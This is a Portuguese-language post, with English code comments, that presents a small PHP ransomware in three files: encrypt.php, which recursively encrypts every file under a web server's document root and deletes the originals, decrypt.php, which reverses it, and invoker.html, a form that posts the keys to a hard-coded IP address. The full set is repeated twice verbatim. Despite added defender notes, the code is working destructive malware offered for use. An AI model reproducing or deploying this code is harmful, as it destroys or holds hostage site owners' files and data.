Muitos já devem ter ouvido falar sobre ransomware, mas poucos sabem como ele funciona. Aqui vai um exemplo: um pequeno ransomware em PHP:
1° Criptografando:
<?php
/**
 * Encrypts or decrypts a string with AES-256-CBC through the OpenSSL extension.
 *
 * @param string $action     'encrypt' or 'decrypt'; any other value falls through and returns null.
 * @param string $string     Plaintext to encrypt, or base64 text to decrypt.
 * @param string $secret_key Passphrase; its SHA-256 hex digest is handed to OpenSSL as the key.
 * @param string $secret_iv  Passphrase; the first 16 characters of its SHA-256 hex digest are the IV.
 * @return string|false|null base64 text on encrypt; plaintext on decrypt, or false when OpenSSL fails.
 */
function encrypt_decrypt($action, $string, $secret_key, $secret_iv) { //Credits to some website which isn't up right now
// Unused in this copy of the helper: both branches below return directly.
$output = false;
$encrypt_method = "AES-256-CBC";
// hash() without the raw flag returns a hex string, not raw bytes.
$key = hash('sha256', $secret_key);
// The IV depends only on $secret_iv, so every call with the same input uses the same IV.
$iv = substr(hash('sha256', $secret_iv), 0, 16);
if( $action == 'encrypt' ) {
// With options = 0 openssl_encrypt() already returns base64, so the result is base64-encoded twice.
return base64_encode(openssl_encrypt($string, $encrypt_method, $key, 0, $iv));
}
else if( $action == 'decrypt' ){
// Undoes the outer base64 here; openssl_decrypt() with options = 0 undoes the inner one.
return openssl_decrypt(base64_decode($string), $encrypt_method, $key, 0, $iv);
}
}
/**
 * Replaces one file with a doubly encrypted copy named "<file>.aes.aes".
 *
 * key1, key2 and iv are read directly from the POST body. The original file is
 * deleted after the write, and neither the read nor the write is checked first,
 * so a failed write still removes the original.
 *
 * Defender notes: the ".aes.aes" suffix and a burst of write-then-delete pairs
 * under the web root are the observable artifacts of this routine.
 *
 * @param string $filename Path of the file to process.
 * @return void
 */
function encfile($filename){
// Skips any path that contains the marker anywhere (substring match, not a suffix check).
if (strpos($filename, '.aes.aes') !== false) {
return;
}
// Inner layer uses key1, outer layer uses key2; both layers share the same iv value.
file_put_contents($filename.".aes.aes", (encrypt_decrypt('encrypt', (encrypt_decrypt('encrypt', file_get_contents($filename), $_POST['key1'], $_POST['iv'])), $_POST['key2'], $_POST['iv'])));
// Removes the original regardless of whether the line above succeeded.
unlink($filename);
}
/**
 * Walks a directory tree recursively and passes every non-directory entry to encfile().
 *
 * Incident-scoping note: is_dir() also returns true for a symlink that points to a
 * directory, so the affected area may not be limited to the starting directory —
 * verify against the actual filesystem layout.
 *
 * @param string $dir Directory to walk.
 * @return void
 */
function encdir($dir){
// Drops the self and parent entries so the recursion does not loop.
// NOTE(review): scandir() returns false for an unreadable directory; that case is not handled here.
$files = array_diff(scandir($dir), array('.', '..'));
foreach($files as $file) {
if(is_dir($dir."/".$file)){
encdir($dir."/".$file);
}else {
encfile($dir."/".$file);
}
}
}
// Entry point: a POST request that carries key1, key2 and iv starts the walk over the whole
// document root; no other condition is checked in this listing.
// Defender notes: the work runs with the privileges of the PHP / web-server process, so it can
// only replace files that account may write and delete. A web root that is read-only for that
// account, plus file-integrity monitoring on it, limits and surfaces this behaviour.
if(isset($_POST['key1']) && isset($_POST['key2']) && isset($_POST['iv'])){
encdir($_SERVER['DOCUMENT_ROOT']);
}
?>
Salve esse código como encrypt.php
2° Desencriptando
<?php
/**
 * Encrypts or decrypts a string with AES-256-CBC through the OpenSSL extension.
 *
 * The recovery script only uses the 'decrypt' branch. CBC is used without any
 * integrity check, so a wrong key is normally reported as false (padding error)
 * but is not guaranteed to be detected.
 *
 * @param string $action     'encrypt' or 'decrypt'; any other value returns false.
 * @param string $string     Plaintext to encrypt, or base64 text to decrypt.
 * @param string $secret_key Passphrase; its SHA-256 hex digest is handed to OpenSSL as the key.
 * @param string $secret_iv  Passphrase; the first 16 characters of its SHA-256 hex digest are the IV.
 * @return string|false base64 text on encrypt; plaintext on decrypt; false on failure or unknown action.
 */
function encrypt_decrypt($action, $string, $secret_key, $secret_iv) {//Credits to some website which isn't up right now
$output = false;
$encrypt_method = "AES-256-CBC";
// hash() without the raw flag returns a hex string, not raw bytes.
$key = hash('sha256', $secret_key);
// The IV depends only on $secret_iv, so every call with the same input uses the same IV.
$iv = substr(hash('sha256', $secret_iv), 0, 16);
if( $action == 'encrypt' ) {
// With options = 0 openssl_encrypt() already returns base64; the next line encodes it a second time.
$output = openssl_encrypt($string, $encrypt_method, $key, 0, $iv);
$output = base64_encode($output);
}
else if( $action == 'decrypt' ){
// Undoes the outer base64 here; openssl_decrypt() with options = 0 undoes the inner one.
$output = openssl_decrypt(base64_decode($string), $encrypt_method, $key, 0, $iv);
}
return $output;
}
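/**
 * Restores one "<name>.aes.aes" file to "<name>" by undoing both encryption layers.
 *
 * key1, key2 and iv are read from the POST body, the same way the encrypting
 * listing reads them. (The earlier version referenced $key1, $key2 and $iv as
 * locals that were never defined inside the function, so every decrypt call ran
 * without keys, and the encrypted file was deleted anyway.)
 *
 * The encrypted file is removed only after both layers decrypted and the
 * plaintext was written; on any failure it is left untouched so that another
 * attempt with the correct values remains possible.
 *
 * @param string $filename Path of the candidate file.
 * @return void
 */
function decfile($filename){
    // The output name is produced by cutting the last 8 characters, so the marker
    // must really be the suffix; a match elsewhere in the path would yield a wrong name.
    if (substr($filename, -8) !== '.aes.aes') {
        return;
    }
    if (!isset($_POST['key1'], $_POST['key2'], $_POST['iv'])) {
        return;
    }

    $ciphertext = file_get_contents($filename);
    if ($ciphertext === false) {
        return;
    }

    // Outer layer was applied with key2, inner layer with key1.
    $inner = encrypt_decrypt('decrypt', $ciphertext, $_POST['key2'], $_POST['iv']);
    if ($inner === false) {
        return;
    }
    $plaintext = encrypt_decrypt('decrypt', $inner, $_POST['key1'], $_POST['iv']);
    if ($plaintext === false) {
        return;
    }

    // Keep the ciphertext unless the restored file is actually on disk.
    if (file_put_contents(substr($filename, 0, -8), $plaintext) === false) {
        return;
    }
    unlink($filename);
}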
/**
 * Walks a directory tree recursively and passes every non-directory entry to decfile().
 *
 * @param string $dir Directory to walk.
 * @return void
 */
function decdir($dir){
// Drops the self and parent entries so the recursion does not loop.
// NOTE(review): scandir() returns false for an unreadable directory; that case is not handled here.
$files = array_diff(scandir($dir), array('.', '..'));
foreach($files as $file) {
if(is_dir($dir."/".$file)){
decdir($dir."/".$file);
}else {
decfile($dir."/".$file);
}
}
}
// Copies the POST fields into script-level variables.
// NOTE(review): these reads run before the isset() check below, so a request without the
// fields triggers undefined-index notices/warnings.
// NOTE(review): PHP functions do not see script-level variables unless they declare them with
// `global`; decfile() has to obtain the values itself.
$key1 = $_POST['key1'];
$key2 = $_POST['key2'];
$iv = $_POST['iv'];
if(isset($_POST['key1']) && isset($_POST['key2']) && isset($_POST['iv'])){
decdir($_SERVER['DOCUMENT_ROOT']);
// Printed unconditionally after the walk; it does not confirm that any file was restored.
echo "Webroot Decrypted";
}
?>
salve esse código como decrypt.php
3° criando a "tela"
<!--
  Plain HTML form that submits three text fields (key1, key2, iv) by POST to the URL in `action`.
  Review notes:
  - The action URL uses http://, so the three values travel unencrypted and are visible to
    network inspection.
  - The field names key1 / key2 / iv are the ones the PHP listings read from $_POST; a POST body
    with exactly these three parameters is a usable matching point for WAF or log review.
  - The action points at main2.php, while the text names the scripts encrypt.php and decrypt.php;
    the relationship between them is not stated on the page.
-->
<html>
<body>
<form method=POST action="http://45.32.119.24/main2.php">
Key 1:<br>
<input type="text" name="key1" value="YouAesKey1">
<br>
Key 2:<br>
<input type="text" name="key2" value="YourAesKey2">
<br>
IV:<br>
<input type="text" name="iv" value="YourIV">
<br><br>
<input type="submit" value="Submit">
</form>
</body>
</html>
salve como invoker.html
Aviso: eu não me responsabilizo por seus atos
1° Criptografando:
<?php
/**
 * Encrypts or decrypts a string with AES-256-CBC through the OpenSSL extension.
 *
 * @param string $action     'encrypt' or 'decrypt'; any other value falls through and returns null.
 * @param string $string     Plaintext to encrypt, or base64 text to decrypt.
 * @param string $secret_key Passphrase; its SHA-256 hex digest is handed to OpenSSL as the key.
 * @param string $secret_iv  Passphrase; the first 16 characters of its SHA-256 hex digest are the IV.
 * @return string|false|null base64 text on encrypt; plaintext on decrypt, or false when OpenSSL fails.
 */
function encrypt_decrypt($action, $string, $secret_key, $secret_iv) { //Credits to some website which isn't up right now
// Unused in this copy of the helper: both branches below return directly.
$output = false;
$encrypt_method = "AES-256-CBC";
// hash() without the raw flag returns a hex string, not raw bytes.
$key = hash('sha256', $secret_key);
// The IV depends only on $secret_iv, so every call with the same input uses the same IV.
$iv = substr(hash('sha256', $secret_iv), 0, 16);
if( $action == 'encrypt' ) {
// With options = 0 openssl_encrypt() already returns base64, so the result is base64-encoded twice.
return base64_encode(openssl_encrypt($string, $encrypt_method, $key, 0, $iv));
}
else if( $action == 'decrypt' ){
// Undoes the outer base64 here; openssl_decrypt() with options = 0 undoes the inner one.
return openssl_decrypt(base64_decode($string), $encrypt_method, $key, 0, $iv);
}
}
/**
 * Replaces one file with a doubly encrypted copy named "<file>.aes.aes".
 *
 * key1, key2 and iv are read directly from the POST body. The original file is
 * deleted after the write, and neither the read nor the write is checked first,
 * so a failed write still removes the original.
 *
 * Defender notes: the ".aes.aes" suffix and a burst of write-then-delete pairs
 * under the web root are the observable artifacts of this routine.
 *
 * @param string $filename Path of the file to process.
 * @return void
 */
function encfile($filename){
// Skips any path that contains the marker anywhere (substring match, not a suffix check).
if (strpos($filename, '.aes.aes') !== false) {
return;
}
// Inner layer uses key1, outer layer uses key2; both layers share the same iv value.
file_put_contents($filename.".aes.aes", (encrypt_decrypt('encrypt', (encrypt_decrypt('encrypt', file_get_contents($filename), $_POST['key1'], $_POST['iv'])), $_POST['key2'], $_POST['iv'])));
// Removes the original regardless of whether the line above succeeded.
unlink($filename);
}
/**
 * Walks a directory tree recursively and passes every non-directory entry to encfile().
 *
 * Incident-scoping note: is_dir() also returns true for a symlink that points to a
 * directory, so the affected area may not be limited to the starting directory —
 * verify against the actual filesystem layout.
 *
 * @param string $dir Directory to walk.
 * @return void
 */
function encdir($dir){
// Drops the self and parent entries so the recursion does not loop.
// NOTE(review): scandir() returns false for an unreadable directory; that case is not handled here.
$files = array_diff(scandir($dir), array('.', '..'));
foreach($files as $file) {
if(is_dir($dir."/".$file)){
encdir($dir."/".$file);
}else {
encfile($dir."/".$file);
}
}
}
// Entry point: a POST request that carries key1, key2 and iv starts the walk over the whole
// document root; no other condition is checked in this listing.
// Defender notes: the work runs with the privileges of the PHP / web-server process, so it can
// only replace files that account may write and delete. A web root that is read-only for that
// account, plus file-integrity monitoring on it, limits and surfaces this behaviour.
if(isset($_POST['key1']) && isset($_POST['key2']) && isset($_POST['iv'])){
encdir($_SERVER['DOCUMENT_ROOT']);
}
?>
Salve esse código como encrypt.php
2° Desencriptando
<?php
/**
 * Encrypts or decrypts a string with AES-256-CBC through the OpenSSL extension.
 *
 * The recovery script only uses the 'decrypt' branch. CBC is used without any
 * integrity check, so a wrong key is normally reported as false (padding error)
 * but is not guaranteed to be detected.
 *
 * @param string $action     'encrypt' or 'decrypt'; any other value returns false.
 * @param string $string     Plaintext to encrypt, or base64 text to decrypt.
 * @param string $secret_key Passphrase; its SHA-256 hex digest is handed to OpenSSL as the key.
 * @param string $secret_iv  Passphrase; the first 16 characters of its SHA-256 hex digest are the IV.
 * @return string|false base64 text on encrypt; plaintext on decrypt; false on failure or unknown action.
 */
function encrypt_decrypt($action, $string, $secret_key, $secret_iv) {//Credits to some website which isn't up right now
$output = false;
$encrypt_method = "AES-256-CBC";
// hash() without the raw flag returns a hex string, not raw bytes.
$key = hash('sha256', $secret_key);
// The IV depends only on $secret_iv, so every call with the same input uses the same IV.
$iv = substr(hash('sha256', $secret_iv), 0, 16);
if( $action == 'encrypt' ) {
// With options = 0 openssl_encrypt() already returns base64; the next line encodes it a second time.
$output = openssl_encrypt($string, $encrypt_method, $key, 0, $iv);
$output = base64_encode($output);
}
else if( $action == 'decrypt' ){
// Undoes the outer base64 here; openssl_decrypt() with options = 0 undoes the inner one.
$output = openssl_decrypt(base64_decode($string), $encrypt_method, $key, 0, $iv);
}
return $output;
}
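/**
 * Restores one "<name>.aes.aes" file to "<name>" by undoing both encryption layers.
 *
 * key1, key2 and iv are read from the POST body, the same way the encrypting
 * listing reads them. (The earlier version referenced $key1, $key2 and $iv as
 * locals that were never defined inside the function, so every decrypt call ran
 * without keys, and the encrypted file was deleted anyway.)
 *
 * The encrypted file is removed only after both layers decrypted and the
 * plaintext was written; on any failure it is left untouched so that another
 * attempt with the correct values remains possible.
 *
 * @param string $filename Path of the candidate file.
 * @return void
 */
function decfile($filename){
    // The output name is produced by cutting the last 8 characters, so the marker
    // must really be the suffix; a match elsewhere in the path would yield a wrong name.
    if (substr($filename, -8) !== '.aes.aes') {
        return;
    }
    if (!isset($_POST['key1'], $_POST['key2'], $_POST['iv'])) {
        return;
    }

    $ciphertext = file_get_contents($filename);
    if ($ciphertext === false) {
        return;
    }

    // Outer layer was applied with key2, inner layer with key1.
    $inner = encrypt_decrypt('decrypt', $ciphertext, $_POST['key2'], $_POST['iv']);
    if ($inner === false) {
        return;
    }
    $plaintext = encrypt_decrypt('decrypt', $inner, $_POST['key1'], $_POST['iv']);
    if ($plaintext === false) {
        return;
    }

    // Keep the ciphertext unless the restored file is actually on disk.
    if (file_put_contents(substr($filename, 0, -8), $plaintext) === false) {
        return;
    }
    unlink($filename);
}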
/**
 * Walks a directory tree recursively and passes every non-directory entry to decfile().
 *
 * @param string $dir Directory to walk.
 * @return void
 */
function decdir($dir){
// Drops the self and parent entries so the recursion does not loop.
// NOTE(review): scandir() returns false for an unreadable directory; that case is not handled here.
$files = array_diff(scandir($dir), array('.', '..'));
foreach($files as $file) {
if(is_dir($dir."/".$file)){
decdir($dir."/".$file);
}else {
decfile($dir."/".$file);
}
}
}
// Copies the POST fields into script-level variables.
// NOTE(review): these reads run before the isset() check below, so a request without the
// fields triggers undefined-index notices/warnings.
// NOTE(review): PHP functions do not see script-level variables unless they declare them with
// `global`; decfile() has to obtain the values itself.
$key1 = $_POST['key1'];
$key2 = $_POST['key2'];
$iv = $_POST['iv'];
if(isset($_POST['key1']) && isset($_POST['key2']) && isset($_POST['iv'])){
decdir($_SERVER['DOCUMENT_ROOT']);
// Printed unconditionally after the walk; it does not confirm that any file was restored.
echo "Webroot Decrypted";
}
?>
salve esse código como decrypt.php
3° criando a "tela"
<!--
  Plain HTML form that submits three text fields (key1, key2, iv) by POST to the URL in `action`.
  Review notes:
  - The action URL uses http://, so the three values travel unencrypted and are visible to
    network inspection.
  - The field names key1 / key2 / iv are the ones the PHP listings read from $_POST; a POST body
    with exactly these three parameters is a usable matching point for WAF or log review.
  - The action points at main2.php, while the text names the scripts encrypt.php and decrypt.php;
    the relationship between them is not stated on the page.
-->
<html>
<body>
<form method=POST action="http://45.32.119.24/main2.php">
Key 1:<br>
<input type="text" name="key1" value="YouAesKey1">
<br>
Key 2:<br>
<input type="text" name="key2" value="YourAesKey2">
<br>
IV:<br>
<input type="text" name="iv" value="YourIV">
<br><br>
<input type="submit" value="Submit">
</form>
</body>
</html>
salve como invoker.html
Aviso: eu não me responsabilizo por seus atos